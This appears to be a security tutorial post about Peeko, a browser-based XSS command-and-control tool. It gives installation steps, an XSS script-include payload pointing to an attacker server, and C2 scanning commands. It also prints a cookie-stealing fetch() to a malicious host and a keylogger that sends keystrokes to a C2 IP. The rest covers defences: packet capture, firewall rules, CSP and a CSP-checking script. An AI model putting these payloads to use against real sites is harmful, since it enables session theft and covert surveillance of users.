Peeko – Browser-based XSS C2 for Stealthy Internal Network Exploration

GitHub – b3rito/peeko: peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.
github.com/b3rito/peeko

You Should Know:

Peeko is a powerful browser-based Command and Control (C2) framework designed for internal network reconnaissance via Cross-Site Scripting (XSS). It enables attackers to stealthily explore internal networks by leveraging infected browsers. Below are key technical details, commands, and practical implementations related to Peeko.

Installation & Setup

1. Clone the Repository:

git clone https://github.com/b3rito/peeko.git
cd peeko

2. Install Dependencies:

pip3 install -r requirements.txt

3. Run the Server:

python3 peeko.py

Generating XSS Payloads

Peeko allows dynamic payload generation for browser exploitation.

<script src="http://<YOUR_SERVER_IP>:8080/peeko.js"></script>

Key Commands for Network Exploration

  • List Internal Hosts:
    peeko> scan --hosts
    
  • Port Scanning via Infected Browser:
    peeko> scan --ports 80,443,22,3389
    
  • Exfiltrate HTTP Requests:
    peeko> capture --http
    

Post-Exploitation Techniques

  • Stealing Cookies:
    fetch('http://malicious-server/steal', { method: 'POST', body: document.cookie });
    
  • Keylogging:
    document.addEventListener('keypress', (e) => { fetch('http://<C2_IP>/log?key=' + e.key); });
    

Defensive Measures (Blue Team)

  • Detecting Peeko Activity:
    sudo tcpdump -i eth0 'port 8080' -w peeko_traffic.pcap
    
  • Blocking a Malicious IP (inbound replies and outbound requests):
    sudo iptables -A INPUT -s <MALICIOUS_IP> -j DROP
    sudo iptables -A OUTPUT -d <MALICIOUS_IP> -j DROP
    

What Undercode Say

Peeko demonstrates how XSS can be weaponized for internal network reconnaissance. Defenders must:
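– Implement CSP (Content Security Policy) without 'unsafe-inline' or 'unsafe-eval' in script-src, since either keyword lets injected script run:

Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'; base-uri 'self';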

– Monitor Suspicious Browser Behavior:

grep -r "peeko.js" /var/log/nginx/

– Use Browser Isolation:

docker run -d --name isolated-browser -p 8080:8080 browserless/chrome
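
For the CSP recommendation above, an added example (not from the original post or the Peeko project): a simplified checker that reports whether a given Content-Security-Policy would still permit an injected external script, an injected inline script, or a fetch() to a foreign origin. The origins, sample policies and function names are constructed for illustration, and only keyword, scheme, `*` and exact-origin sources are modelled.

```python
# Added example: simplified CSP check (assumption: only keyword, scheme, '*'
# and exact-origin sources are modelled; no paths or wildcard subdomains).
from urllib.parse import urlsplit

PAGE = "http://intranet.example"   # constructed origin of the vulnerable app
C2 = "http://203.0.113.10:8080"    # constructed C2 origin (TEST-NET-3)
WEAK = "default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval';"
STRICT = "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'"

def parse_csp(header):
    """Return {directive: [sources]}; the first occurrence of a directive wins."""
    policy = {}
    for part in header.split(";"):
        tokens = part.lower().split()
        if tokens and tokens[0] not in policy:
            policy[tokens[0]] = tokens[1:]
    return policy

def sources_for(policy, directive):
    # script-src and connect-src fall back to default-src when absent
    return policy.get(directive, policy.get("default-src"))

def url_allowed(policy, directive, url, page_origin):
    sources = sources_for(policy, directive)
    if sources is None:            # no governing directive: unrestricted
        return True
    u = urlsplit(url.lower())
    origin, scheme = f"{u.scheme}://{u.netloc}", u.scheme + ":"
    return any(s in ("*", scheme, origin) or (s == "'self'" and origin == page_origin.lower())
               for s in sources)

def inline_script_allowed(policy):
    sources = sources_for(policy, "script-src")
    if sources is None:
        return True
    # browsers ignore 'unsafe-inline' once a nonce or hash source is present
    pinned = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources)
    return "'unsafe-inline'" in sources and not pinned

def assess(header, page_origin=PAGE, c2_origin=C2):
    """Which of the page's three injection patterns would this policy permit?"""
    p = parse_csp(header)
    return {
        "external_script": url_allowed(p, "script-src", c2_origin + "/peeko.js", page_origin),
        "inline_script": inline_script_allowed(p),
        "fetch_to_c2": url_allowed(p, "connect-src", c2_origin + "/log", page_origin),
    }

if __name__ == "__main__":
    print({name: assess(csp) for name, csp in (("none", ""), ("weak", WEAK), ("strict", STRICT))})
```

A policy that keeps 'unsafe-inline' in script-src blocks the external script load but still lets injected inline script run, which is why the check reports the two separately.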

Additional Linux & Windows Commands for Security

  • Linux:
    # Check active connections (listening and established)
    netstat -tanp | grep ':8080'
    
    # Analyze JavaScript files
    strings peeko.js | grep "C2"
    

  • Windows:

    # Detect outbound connections
    Get-NetTCPConnection -RemotePort 8080
    
    # Block IP via Firewall
    New-NetFirewallRule -DisplayName "Block Peeko C2" -Direction Outbound -RemoteAddress <MALICIOUS_IP> -Action Block
    

Expected Output:

A functional Peeko C2 server with active XSS payloads, logging internal network data while evading detection via browser-based obfuscation.

References:

Reported By: Florian Hansemann – Hackers Feeds